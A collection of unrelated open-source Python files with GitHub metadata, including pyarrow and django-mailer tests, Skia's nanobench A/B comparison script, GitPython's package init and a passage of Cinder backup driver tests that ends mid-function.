"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "49353"
},
{
"name": "HTML",
"bytes": "15929"
},
{
"name": "JavaScript",
"bytes": "69850"
},
{
"name": "Makefile",
"bytes": "2270"
},
{
"name": "Python",
"bytes": "28371"
}
],
"symlink_target": ""
} |
import sys
import pyarrow as pa
from pyarrow import filesystem
import pytest
def test_filesystem_deprecated():
with pytest.warns(FutureWarning):
filesystem.LocalFileSystem()
with pytest.warns(FutureWarning):
filesystem.LocalFileSystem.get_instance()
@pytest.mark.skipif(sys.version_info < (3, 7),
reason="getattr needs Python 3.7")
def test_filesystem_deprecated_toplevel():
with pytest.warns(FutureWarning):
pa.localfs
with pytest.warns(FutureWarning):
pa.FileSystem
with pytest.warns(FutureWarning):
pa.LocalFileSystem
with pytest.warns(FutureWarning):
pa.HadoopFileSystem
def test_resolve_uri():
uri = "file:///home/user/myfile.parquet"
fs, path = filesystem.resolve_filesystem_and_path(uri)
assert isinstance(fs, filesystem.LocalFileSystem)
assert path == "/home/user/myfile.parquet"
def test_resolve_local_path():
for uri in ['/home/user/myfile.parquet',
'myfile.parquet',
'my # file ? parquet',
'C:/Windows/myfile.parquet',
r'C:\\Windows\\myfile.parquet',
]:
fs, path = filesystem.resolve_filesystem_and_path(uri)
assert isinstance(fs, filesystem.LocalFileSystem)
assert path == uri
| {
"content_hash": "d7057fb39d5864fe0c4b3a737b3446b4",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 62,
"avg_line_length": 26.4,
"alnum_prop": 0.6454545454545455,
"repo_name": "cpcloud/arrow",
"id": "3d54f33e1f2fdd99ca8679fdadf8be46288a43e3",
"size": "2106",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/pyarrow/tests/test_filesystem.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "486660"
},
{
"name": "Awk",
"bytes": "3709"
},
{
"name": "Batchfile",
"bytes": "29705"
},
{
"name": "C",
"bytes": "1078695"
},
{
"name": "C#",
"bytes": "911504"
},
{
"name": "C++",
"bytes": "18880401"
},
{
"name": "CMake",
"bytes": "588081"
},
{
"name": "Cython",
"bytes": "1156054"
},
{
"name": "Dockerfile",
"bytes": "108671"
},
{
"name": "Emacs Lisp",
"bytes": "1916"
},
{
"name": "FreeMarker",
"bytes": "2312"
},
{
"name": "Go",
"bytes": "1794213"
},
{
"name": "HTML",
"bytes": "3430"
},
{
"name": "Java",
"bytes": "5134538"
},
{
"name": "JavaScript",
"bytes": "110059"
},
{
"name": "Jinja",
"bytes": "9101"
},
{
"name": "Julia",
"bytes": "241544"
},
{
"name": "Lua",
"bytes": "8771"
},
{
"name": "MATLAB",
"bytes": "36260"
},
{
"name": "Makefile",
"bytes": "19262"
},
{
"name": "Meson",
"bytes": "55180"
},
{
"name": "Objective-C++",
"bytes": "12128"
},
{
"name": "PLpgSQL",
"bytes": "56995"
},
{
"name": "Perl",
"bytes": "3803"
},
{
"name": "Python",
"bytes": "2417779"
},
{
"name": "R",
"bytes": "864022"
},
{
"name": "Ruby",
"bytes": "1366715"
},
{
"name": "Shell",
"bytes": "312029"
},
{
"name": "Thrift",
"bytes": "142245"
},
{
"name": "TypeScript",
"bytes": "1183174"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from mailer.models import Message, MessageLog
from mailer.engine import send_all
import smtplib
sent_messages = []
class TestMailerEmailBackend(object):
def __init__(self, **kwargs):
global sent_messages
sent_messages = []
def open(self):
pass
def close(self):
pass
def send_messages(self, email_messages):
global sent_messages
sent_messages.extend(email_messages)
class FailingMailerEmailBackend(TestMailerEmailBackend):
def send_messages(self, email_messages):
raise smtplib.SMTPSenderRefused(1, "foo", "[email protected]")
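# Note: as exercised in TestSending.test_retry_deferred below, send_all()
# catches the SMTPSenderRefused raised here and moves the message into the
# deferred queue instead of dropping it.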
class TestBackend(TestCase):
def test_save_to_db(self):
"""
Test that using send_mail creates a Message object in DB instead, when EMAIL_BACKEND is set.
"""
from django.core.mail import send_mail
self.assertEqual(Message.objects.count(), 0)
with self.settings(EMAIL_BACKEND="mailer.backend.DbBackend"):
send_mail("Subject", "Body", "[email protected]", ["[email protected]"])
self.assertEqual(Message.objects.count(), 1)
class TestSending(TestCase):
def test_mailer_email_backend(self):
"""
Test that calling "manage.py send_mail" actually sends mail using the specified MAILER_EMAIL_BACKEND
"""
global sent_messages
from mailer import send_mail
with self.settings(MAILER_EMAIL_BACKEND="mailer.tests.TestMailerEmailBackend"):
send_mail("Subject", "Body", "[email protected]", ["[email protected]"])
self.assertEqual(Message.objects.count(), 1)
self.assertEqual(len(sent_messages), 0)
from mailer.engine import send_all
send_all()
self.assertEqual(len(sent_messages), 1)
self.assertEqual(Message.objects.count(), 0)
self.assertEqual(MessageLog.objects.count(), 1)
def test_retry_deferred(self):
global sent_messages
from mailer import send_mail
with self.settings(MAILER_EMAIL_BACKEND="mailer.tests.FailingMailerEmailBackend"):
send_mail("Subject", "Body", "[email protected]", ["[email protected]"])
send_all()
self.assertEqual(Message.objects.count(), 1)
self.assertEqual(Message.objects.deferred().count(), 1)
with self.settings(MAILER_EMAIL_BACKEND="mailer.tests.TestMailerEmailBackend"):
send_all()
self.assertEqual(len(sent_messages), 0)
# Should not have sent the deferred ones
self.assertEqual(Message.objects.count(), 1)
self.assertEqual(Message.objects.deferred().count(), 1)
# Now mark them for retrying
Message.objects.retry_deferred()
send_all()
self.assertEqual(len(sent_messages), 1)
self.assertEqual(Message.objects.count(), 0)
| {
"content_hash": "351c1d73ba035c47723711d8d1267d36",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 108,
"avg_line_length": 35.76829268292683,
"alnum_prop": 0.6406409819297647,
"repo_name": "nai-central/django-mailer",
"id": "0c6a99b3252eaa913c541f3da03de1f8de1ab5c8",
"size": "2933",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "mailer/tests.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
from __future__ import print_function
import re
import os
import sys
import time
import json
import subprocess
import shlex
import multiprocessing
import traceback
from argparse import ArgumentParser
from multiprocessing import Process
from threading import Thread
from threading import Lock
from pdb import set_trace
HELP = """
\033[31mPlease call calmbench.py to drive this script if you're not doing so.
This script is not supposed to be used by itself. (At least, it's not easy to
use by itself. The calmbench bots may use this script directly.)
\033[0m
"""
FACTOR = 3 # lower/upper quantile factor
DIFF_T = 0.99 # different enough threshold
TERM = 10 # terminate after this no. of iterations without suspect changes
MAXTRY = 30 # max number of nanobench tries to narrow down suspects
UNITS = "ns µs ms s".split()
timesLock = Lock()
timesA = {}
timesB = {}
def parse_args():
parser = ArgumentParser(description=HELP)
parser.add_argument('outdir', type=str, help="output directory")
parser.add_argument('a', type=str, help="name of A")
parser.add_argument('b', type=str, help="name of B")
parser.add_argument('nano_a', type=str, help="path to A's nanobench binary")
parser.add_argument('nano_b', type=str, help="path to B's nanobench binary")
parser.add_argument('arg_a', type=str, help="args for A's nanobench run")
parser.add_argument('arg_b', type=str, help="args for B's nanobench run")
parser.add_argument('repeat', type=int, help="number of initial runs")
parser.add_argument('skip_b', type=str, help=("whether to skip running B"
" ('true' or 'false')"))
  parser.add_argument('config', type=str, help="nanobench config")
parser.add_argument('threads', type=int, help="number of threads to run")
  parser.add_argument('noinit', type=str, help=("whether to skip the"
                      " initial runs ('true' or 'false')"))
parser.add_argument('--concise', dest='concise', action="store_true",
help="If set, no verbose thread info will be printed.")
parser.set_defaults(concise=False)
# Additional args for bots
BHELP = "bot specific options"
parser.add_argument('--githash', type=str, default="", help=BHELP)
parser.add_argument('--keys', type=str, default=[], nargs='+', help=BHELP)
args = parser.parse_args()
args.skip_b = args.skip_b == "true"
args.noinit = args.noinit == "true"
if args.threads == -1:
args.threads = 1
if args.config in ["8888", "565"]: # multi-thread for CPU only
args.threads = max(1, multiprocessing.cpu_count() / 2)
return args
def append_dict_sorted_array(dict_array, key, value):
if key not in dict_array:
dict_array[key] = []
dict_array[key].append(value)
dict_array[key].sort()
def add_time(args, name, bench, t, unit):
normalized_t = t * 1000 ** UNITS.index(unit);
if name.startswith(args.a):
append_dict_sorted_array(timesA, bench, normalized_t)
else:
append_dict_sorted_array(timesB, bench, normalized_t)
def append_times_from_file(args, name, filename):
with open(filename) as f:
lines = f.readlines()
for line in lines:
items = line.split()
if len(items) > 10:
bench = items[10]
matches = re.search("([+-]?\d*.?\d+)(s|ms|µs|ns)", items[3])
if (not matches or items[9] != args.config):
continue
time_num = matches.group(1)
time_unit = matches.group(2)
add_time(args, name, bench, float(time_num), time_unit)
class ThreadWithException(Thread):
def __init__(self, target):
super(ThreadWithException, self).__init__(target = target)
self.exception = None
def run(self):
try:
self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
except BaseException as e:
self.exception = e
def join(self, timeout=None):
super(ThreadWithException, self).join(timeout)
class ThreadRunner:
"""Simplest and stupidiest threaded executer."""
def __init__(self, args):
self.concise = args.concise
self.threads = []
def add(self, args, fn):
if len(self.threads) >= args.threads:
self.wait()
t = ThreadWithException(target = fn)
t.daemon = True
self.threads.append(t)
t.start()
def wait(self):
def spin():
i = 0
spinners = [". ", ".. ", "..."]
while len(self.threads) > 0:
timesLock.acquire()
sys.stderr.write(
"\r" + spinners[i % len(spinners)] +
" (%d threads running)" % len(self.threads) +
" \r" # spaces for erasing characters
)
timesLock.release()
time.sleep(0.5)
i += 1
if not self.concise:
ts = Thread(target = spin);
ts.start()
for t in self.threads:
t.join()
exceptions = []
for t in self.threads:
if t.exception:
exceptions.append(t.exception)
self.threads = []
if not self.concise:
ts.join()
if len(exceptions):
for exc in exceptions:
print(exc)
raise exceptions[0]
def split_arg(arg):
raw = shlex.split(arg)
result = []
for r in raw:
if '~' in r:
result.append(os.path.expanduser(r))
else:
result.append(r)
return result
def run(args, threadRunner, name, nano, arg, i):
def task():
file_i = "%s/%s.out%d" % (args.outdir, name, i)
should_run = not args.noinit and not (name == args.b and args.skip_b)
if i <= 0:
should_run = True # always run for suspects
if should_run:
if i > 0:
timesLock.acquire()
print("Init run %d for %s..." % (i, name))
timesLock.release()
subprocess.check_call(["touch", file_i])
with open(file_i, 'w') as f:
subprocess.check_call([nano] + split_arg(arg) +
["--config", args.config], stderr=f, stdout=f)
timesLock.acquire()
append_times_from_file(args, name, file_i)
timesLock.release()
threadRunner.add(args, task)
def init_run(args):
threadRunner = ThreadRunner(args)
for i in range(1, max(args.repeat, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a, args.arg_a, i)
run(args, threadRunner, args.b, args.nano_b, args.arg_b, i)
threadRunner.wait()
def get_lower_upper(values):
i = max(0, (len(values) - 1) / FACTOR)
return values[i], values[-i - 1]
def different_enough(lower1, upper2):
return upper2 < DIFF_T * lower1
# TODO(liyuqian): we used this hacky criterion mainly because I didn't have
# time to study more rigorous statistical tests. We should adopt a more rigorous
# test in the future.
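# Worked example (made-up numbers): with FACTOR = 3 and nine samples per
# bench, get_lower_upper() returns values[2] and values[-3], a rough inner-
# tertile range; a bench becomes a suspect only when one build's upper value
# is still below DIFF_T (99%) of the other build's lower value.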
def get_suspects():
suspects = []
for bench in timesA.keys():
if bench not in timesB:
continue
lowerA, upperA = get_lower_upper(timesA[bench])
lowerB, upperB = get_lower_upper(timesB[bench])
if different_enough(lowerA, upperB) or different_enough(lowerB, upperA):
suspects.append(bench)
return suspects
def process_bench_pattern(s):
if ".skp" in s: # skp bench won't match their exact names...
return "^\"" + s[0:(s.index(".skp") + 3)] + "\""
else:
return "^\"" + s + "\"$"
def suspects_arg(suspects):
patterns = map(process_bench_pattern, suspects)
return " --match " + (" ".join(patterns))
def median(array):
return array[len(array) / 2]
def regression(bench):
a = median(timesA[bench])
b = median(timesB[bench])
if (a == 0): # bad bench, just return no regression
return 1
return b / a
def percentage(x):
return (x - 1) * 100
def format_r(r):
return ('%6.2f' % percentage(r)) + "%"
def normalize_r(r):
if r > 1.0:
return r - 1.0
else:
return 1.0 - 1/r
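# Worked example (hypothetical medians): if median(A) = 8ms and
# median(B) = 10ms for a bench, regression() returns 1.25, the report marks A
# as " 25.00%" faster, and normalize_r(1.25) = 0.25 is written to the JSON
# output as the signed regression.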
def test():
args = parse_args()
init_run(args)
last_unchanged_iter = 0
last_suspect_number = -1
tryCnt = 0
it = 0
while tryCnt < MAXTRY:
it += 1
suspects = get_suspects()
if len(suspects) != last_suspect_number:
last_suspect_number = len(suspects)
last_unchanged_iter = it
if (len(suspects) == 0 or it - last_unchanged_iter >= TERM):
break
print("Number of suspects at iteration %d: %d" % (it, len(suspects)))
threadRunner = ThreadRunner(args)
for j in range(1, max(1, args.threads / 2) + 1):
run(args, threadRunner, args.a, args.nano_a,
args.arg_a + suspects_arg(suspects), -j)
run(args, threadRunner, args.b, args.nano_b,
args.arg_b + suspects_arg(suspects), -j)
tryCnt += 1
threadRunner.wait()
suspects = get_suspects()
if len(suspects) == 0:
print(("%s and %s does not seem to have significant " + \
"performance differences.") % (args.a, args.b))
else:
suspects.sort(key = regression)
print("%s (compared to %s) is likely" % (args.a, args.b))
for suspect in suspects:
r = regression(suspect)
if r < 1:
print("\033[31m %s slower in %s\033[0m" % (format_r(1/r), suspect))
else:
print("\033[32m %s faster in %s\033[0m" % (format_r(r), suspect))
with open("%s/bench_%s_%s.json" % (args.outdir, args.a, args.b), 'w') as f:
results = {}
for bench in timesA:
r = regression(bench) if bench in suspects else 1.0
results[bench] = {
args.config: {
"signed_regression": normalize_r(r),
"lower_quantile_ms": get_lower_upper(timesA[bench])[0] * 1e-6,
"upper_quantile_ms": get_lower_upper(timesA[bench])[1] * 1e-6,
"options": {
# TODO(liyuqian): let ab.py call nanobench with --outResultsFile so
# nanobench could generate the json for us that's exactly the same
# as that being used by perf bots. Currently, we cannot guarantee
# that bench is the name (e.g., bench may have additional resolution
# information appended after name).
"name": bench
}
}
}
output = {"results": results}
if args.githash:
output["gitHash"] = args.githash
if args.keys:
keys = {}
for i in range(len(args.keys) / 2):
keys[args.keys[i * 2]] = args.keys[i * 2 + 1]
output["key"] = keys
f.write(json.dumps(output, indent=4))
print(("\033[36mJSON results available in %s\033[0m" % f.name))
with open("%s/bench_%s_%s.csv" % (args.outdir, args.a, args.b), 'w') as out:
out.write(("bench, significant?, raw regresion, " +
"%(A)s quantile (ns), %(B)s quantile (ns), " +
"%(A)s (ns), %(B)s (ns)\n") % {'A': args.a, 'B': args.b})
for bench in suspects + timesA.keys():
if (bench not in timesA or bench not in timesB):
continue
ta = timesA[bench]
tb = timesB[bench]
out.write(
"%s, %s, %f, " % (bench, bench in suspects, regression(bench)) +
' '.join(map(str, get_lower_upper(ta))) + ", " +
' '.join(map(str, get_lower_upper(tb))) + ", " +
("%s, %s\n" % (' '.join(map(str, ta)), ' '.join(map(str, tb))))
)
print(("\033[36m" +
"Compared %d benches. " +
"%d of them seem to be significantly differrent." +
"\033[0m") %
(len([x for x in timesA if x in timesB]), len(suspects)))
print("\033[36mPlease see detailed bench results in %s\033[0m" % out.name)
if __name__ == "__main__":
try:
test()
except Exception as e:
print(e)
print(HELP)
traceback.print_exc()
raise e
| {
"content_hash": "65661ba4bbccc2ef36cab9348f2cd8c1",
"timestamp": "",
"source": "github",
"line_count": 382,
"max_line_length": 80,
"avg_line_length": 29.829842931937172,
"alnum_prop": 0.604212373848179,
"repo_name": "google/skia",
"id": "9823f15b93d52bc7eb71242536e855801cc18066",
"size": "12262",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "tools/calmbench/ab.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "1277381"
},
{
"name": "Batchfile",
"bytes": "17474"
},
{
"name": "C",
"bytes": "6724920"
},
{
"name": "C#",
"bytes": "4683"
},
{
"name": "C++",
"bytes": "28759992"
},
{
"name": "CMake",
"bytes": "2850"
},
{
"name": "Cuda",
"bytes": "944096"
},
{
"name": "Dockerfile",
"bytes": "7142"
},
{
"name": "GLSL",
"bytes": "65328"
},
{
"name": "Go",
"bytes": "108521"
},
{
"name": "HTML",
"bytes": "1274414"
},
{
"name": "Java",
"bytes": "165376"
},
{
"name": "JavaScript",
"bytes": "110447"
},
{
"name": "Lex",
"bytes": "2458"
},
{
"name": "Lua",
"bytes": "70982"
},
{
"name": "Makefile",
"bytes": "10499"
},
{
"name": "Objective-C",
"bytes": "55140"
},
{
"name": "Objective-C++",
"bytes": "161861"
},
{
"name": "PHP",
"bytes": "128097"
},
{
"name": "Python",
"bytes": "1028767"
},
{
"name": "Shell",
"bytes": "63875"
}
],
"symlink_target": ""
} |
from oslo_log import log as logging
from aim import config as aim_cfg
from aim.tools.cli.groups import aimcli
from aim.tools.cli.commands import * # noqa
logging.register_options(aim_cfg.CONF)
aim = aimcli.aim
def run():
aim(auto_envvar_prefix='AIM')
if __name__ == '__main__':
run()
| {
"content_hash": "855a3fa0ca3ddad345718d4133236394",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 44,
"avg_line_length": 18.6875,
"alnum_prop": 0.6923076923076923,
"repo_name": "noironetworks/aci-integration-module",
"id": "015943ddf32b3b942ad21536f142cb3c7a4865c1",
"size": "932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aim/tools/cli/shell.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "1899856"
},
{
"name": "Roff",
"bytes": "437"
},
{
"name": "Shell",
"bytes": "2552"
}
],
"symlink_target": ""
} |
"""
Shows backlog count of ScheduledEmail
"""
from typing import Any
from django.core.management.base import BaseCommand
from django.utils.timezone import now as timezone_now
from zerver.models import ScheduledEmail
from datetime import timedelta
class Command(BaseCommand):
help = """Shows backlog count of ScheduledEmail
(The number of currently overdue (by at least a minute) email jobs)
This is run as part of the nagios health check for the deliver_email command.
Usage: ./manage.py print_email_delivery_backlog
"""
def handle(self, *args, **options):
# type: (*Any, **Any) -> None
print(ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now()-timedelta(minutes=1)).count())
| {
"content_hash": "91a55aef9d0b2093bb2d518b264bb7f5",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 82,
"avg_line_length": 28.423076923076923,
"alnum_prop": 0.7320703653585927,
"repo_name": "amanharitsh123/zulip",
"id": "8f9e5f94730c35c89fba08ef23adeb786d63f762",
"size": "763",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "zerver/management/commands/print_email_delivery_backlog.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "432211"
},
{
"name": "Emacs Lisp",
"bytes": "158"
},
{
"name": "HTML",
"bytes": "494378"
},
{
"name": "JavaScript",
"bytes": "2167185"
},
{
"name": "Nginx",
"bytes": "1485"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "401825"
},
{
"name": "Puppet",
"bytes": "86921"
},
{
"name": "Python",
"bytes": "3792729"
},
{
"name": "Ruby",
"bytes": "249744"
},
{
"name": "Shell",
"bytes": "61752"
}
],
"symlink_target": ""
} |
import os
import sys
import inspect
__version__ = 'git'
#{ Initialization
def _init_externals():
"""Initialize external projects by putting them into the path"""
if __version__ == 'git':
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'ext', 'gitdb'))
try:
import gitdb
except ImportError:
raise ImportError("'gitdb' could not be found in your PYTHONPATH")
# END verify import
#} END initialization
#################
_init_externals()
#################
#{ Imports
from git.config import GitConfigParser # @NoMove @IgnorePep8
from git.objects import * # @NoMove @IgnorePep8
from git.refs import * # @NoMove @IgnorePep8
from git.diff import * # @NoMove @IgnorePep8
from git.exc import * # @NoMove @IgnorePep8
from git.db import * # @NoMove @IgnorePep8
from git.cmd import Git # @NoMove @IgnorePep8
from git.repo import Repo # @NoMove @IgnorePep8
from git.remote import * # @NoMove @IgnorePep8
from git.index import * # @NoMove @IgnorePep8
from git.util import ( # @NoMove @IgnorePep8
LockFile,
BlockingLockFile,
Stats,
Actor
)
#} END imports
__all__ = [name for name, obj in locals().items()
if not (name.startswith('_') or inspect.ismodule(obj))]
| {
"content_hash": "b9d995bbbba13a27eb7c543ff1256bbe",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 83,
"avg_line_length": 29.208333333333332,
"alnum_prop": 0.5834522111269614,
"repo_name": "expobrain/GitPython",
"id": "58e4e7b65856be98b39745cad8a83fe7b058dfb8",
"size": "1663",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "git/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "561"
},
{
"name": "Python",
"bytes": "769647"
},
{
"name": "Shell",
"bytes": "367"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, "README.md"), encoding="utf-8") as f:
long_description = f.read()
setup(
name="Bernard J. Ortcutt",
version="0.4.0",
description="Reddit moderation automated through reports",
long_description=long_description,
url="https://github.com/leviroth/bernard",
author="Levi Roth",
author_email="[email protected]",
license="MIT",
classifiers=[
"Development Status :: 4 - Alpha",
"Environment :: Console",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
],
keywords="reddit moderation",
packages=find_packages(exclude=["contrib", "docs", "tests"]),
install_requires=[
"praw >= 5.0, <6.0",
"prawdditions >= 0.1.2, <0.1.3",
"pyyaml >=5.4, <6.0",
],
setup_requires=["pytest-runner >=2.1"],
tests_require=[
"betamax >=0.8, <0.9",
"betamax-matchers >=0.3.0, <0.4",
"betamax-serializers >=0.2, <0.3",
"pytest >=2.7.3",
],
test_suite="pytest",
)
| {
"content_hash": "bb8af6e2e9ec2e49cc9d58c446affe37",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 65,
"avg_line_length": 30.666666666666668,
"alnum_prop": 0.5970496894409938,
"repo_name": "leviroth/bernard",
"id": "e769f41fd3cf1f70b8b113a9a0f24aed450647d0",
"size": "1288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "43694"
}
],
"symlink_target": ""
} |
""" Tests for the backup service base driver. """
import uuid
import mock
from oslo_serialization import jsonutils
from cinder.backup import driver
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder import test
from cinder.tests.unit.backup import fake_service
_backup_db_fields = ['id', 'user_id', 'project_id',
'volume_id', 'host', 'availability_zone',
'display_name', 'display_description',
'container', 'status', 'fail_reason',
'service_metadata', 'service', 'size',
'object_count']
class BackupBaseDriverTestCase(test.TestCase):
def _create_volume_db_entry(self, id, size):
vol = {'id': id, 'size': size, 'status': 'available'}
return db.volume_create(self.ctxt, vol)['id']
def _create_backup_db_entry(self, backupid, volid, size,
userid='user-id', projectid='project-id'):
backup = {'id': backupid, 'size': size, 'volume_id': volid,
'user_id': userid, 'project_id': projectid}
return db.backup_create(self.ctxt, backup)['id']
def setUp(self):
super(BackupBaseDriverTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.volume_id = str(uuid.uuid4())
self.backup_id = str(uuid.uuid4())
self._create_backup_db_entry(self.backup_id, self.volume_id, 1)
self._create_volume_db_entry(self.volume_id, 1)
self.backup = objects.Backup.get_by_id(self.ctxt, self.backup_id)
self.driver = fake_service.FakeBackupService(self.ctxt)
def test_get_metadata(self):
json_metadata = self.driver.get_metadata(self.volume_id)
metadata = jsonutils.loads(json_metadata)
self.assertEqual(2, metadata['version'])
def test_put_metadata(self):
metadata = {'version': 1}
self.driver.put_metadata(self.volume_id, jsonutils.dumps(metadata))
def test_get_put_metadata(self):
json_metadata = self.driver.get_metadata(self.volume_id)
self.driver.put_metadata(self.volume_id, json_metadata)
def test_export_record(self):
export_record = self.driver.export_record(self.backup)
self.assertDictEqual({}, export_record)
def test_import_record(self):
export_record = {'key1': 'value1'}
self.assertIsNone(self.driver.import_record(self.backup,
export_record))
class BackupMetadataAPITestCase(test.TestCase):
def _create_volume_db_entry(self, id, size, display_name,
display_description):
vol = {'id': id, 'size': size, 'status': 'available',
'display_name': display_name,
'display_description': display_description}
return db.volume_create(self.ctxt, vol)['id']
def setUp(self):
super(BackupMetadataAPITestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.volume_id = str(uuid.uuid4())
self.volume_display_name = 'vol-1'
self.volume_display_description = 'test vol'
self._create_volume_db_entry(self.volume_id, 1,
self.volume_display_name,
self.volume_display_description)
self.bak_meta_api = driver.BackupMetadataAPI(self.ctxt)
def _add_metadata(self, vol_meta=False, vol_glance_meta=False):
if vol_meta:
# Add some VolumeMetadata
db.volume_metadata_update(self.ctxt, self.volume_id,
{'fee': 'fi'}, False)
db.volume_metadata_update(self.ctxt, self.volume_id,
{'fo': 'fum'}, False)
if vol_glance_meta:
# Add some GlanceMetadata
db.volume_glance_metadata_create(self.ctxt, self.volume_id,
'disk_format', 'bare')
db.volume_glance_metadata_create(self.ctxt, self.volume_id,
'container_type', 'ovf')
def test_get(self):
# Volume won't have anything other than base by default
meta = self.bak_meta_api.get(self.volume_id)
s1 = set(jsonutils.loads(meta).keys())
s2 = ['version', self.bak_meta_api.TYPE_TAG_VOL_BASE_META]
self.assertEqual(set(), s1.symmetric_difference(s2))
self._add_metadata(vol_glance_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
s1 = set(jsonutils.loads(meta).keys())
s2 = ['version', self.bak_meta_api.TYPE_TAG_VOL_BASE_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META]
self.assertEqual(set(), s1.symmetric_difference(s2))
self._add_metadata(vol_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
s1 = set(jsonutils.loads(meta).keys())
s2 = ['version', self.bak_meta_api.TYPE_TAG_VOL_BASE_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META,
self.bak_meta_api.TYPE_TAG_VOL_META]
self.assertEqual(set(), s1.symmetric_difference(s2))
def test_put(self):
meta = self.bak_meta_api.get(self.volume_id)
self.bak_meta_api.put(self.volume_id, meta)
self._add_metadata(vol_glance_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
self.bak_meta_api.put(self.volume_id, meta)
self._add_metadata(vol_meta=True)
meta = self.bak_meta_api.get(self.volume_id)
self.bak_meta_api.put(self.volume_id, meta)
def test_put_invalid_version(self):
container = jsonutils.dumps({'version': 3})
self.assertRaises(exception.BackupMetadataUnsupportedVersion,
self.bak_meta_api.put, self.volume_id, container)
def test_v1_restore_factory(self):
fact = self.bak_meta_api._v1_restore_factory()
keys = [self.bak_meta_api.TYPE_TAG_VOL_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META]
self.assertEqual(set([]),
set(keys).symmetric_difference(set(fact.keys())))
meta_container = {self.bak_meta_api.TYPE_TAG_VOL_BASE_META:
{'display_name': 'vol-2',
'display_description': 'description'},
self.bak_meta_api.TYPE_TAG_VOL_META: {},
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META: {}}
for f in fact:
func = fact[f][0]
fields = fact[f][1]
func(meta_container[f], self.volume_id, fields)
vol = db.volume_get(self.ctxt, self.volume_id)
self.assertEqual(self.volume_display_name, vol['display_name'])
self.assertEqual(self.volume_display_description,
vol['display_description'])
def test_v2_restore_factory(self):
fact = self.bak_meta_api._v2_restore_factory()
keys = [self.bak_meta_api.TYPE_TAG_VOL_BASE_META,
self.bak_meta_api.TYPE_TAG_VOL_META,
self.bak_meta_api.TYPE_TAG_VOL_GLANCE_META]
self.assertEqual(set([]),
set(keys).symmetric_difference(set(fact.keys())))
for f in fact:
func = fact[f][0]
fields = fact[f][1]
func({}, self.volume_id, fields)
def test_restore_vol_glance_meta(self):
# Fields is an empty list for _restore_vol_glance_meta method.
fields = []
container = {}
self.bak_meta_api._save_vol_glance_meta(container, self.volume_id)
self.bak_meta_api._restore_vol_glance_meta(container, self.volume_id,
fields)
self._add_metadata(vol_glance_meta=True)
self.bak_meta_api._save_vol_glance_meta(container, self.volume_id)
self.bak_meta_api._restore_vol_glance_meta(container, self.volume_id,
fields)
def test_restore_vol_meta(self):
# Fields is an empty list for _restore_vol_meta method.
fields = []
container = {}
self.bak_meta_api._save_vol_meta(container, self.volume_id)
# Extract volume metadata from container.
metadata = container.get('volume-metadata', {})
self.bak_meta_api._restore_vol_meta(metadata, self.volume_id,
fields)
self._add_metadata(vol_meta=True)
self.bak_meta_api._save_vol_meta(container, self.volume_id)
# Extract volume metadata from container.
metadata = container.get('volume-metadata', {})
self.bak_meta_api._restore_vol_meta(metadata, self.volume_id, fields)
def test_restore_vol_base_meta(self):
# Fields is a list with 'encryption_key_id' for
# _restore_vol_base_meta method.
fields = ['encryption_key_id']
container = {}
self.bak_meta_api._save_vol_base_meta(container, self.volume_id)
self.bak_meta_api._restore_vol_base_meta(container, self.volume_id,
fields)
def _create_encrypted_volume_db_entry(self, id, type_id, encrypted):
if encrypted:
vol = {'id': id, 'size': 1, 'status': 'available',
'volume_type_id': type_id, 'encryption_key_id': 'fake_id'}
else:
vol = {'id': id, 'size': 1, 'status': 'available',
'volume_type_id': type_id, 'encryption_key_id': None}
return db.volume_create(self.ctxt, vol)['id']
def test_restore_encrypted_vol_to_different_volume_type(self):
fields = ['encryption_key_id']
container = {}
# Create an encrypted volume
enc_vol1_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type',
True)
# Create a second encrypted volume, of a different volume type
enc_vol2_id = self._create_encrypted_volume_db_entry(str(uuid.uuid4()),
'enc_vol_type2',
True)
# Backup the first volume and attempt to restore to the second
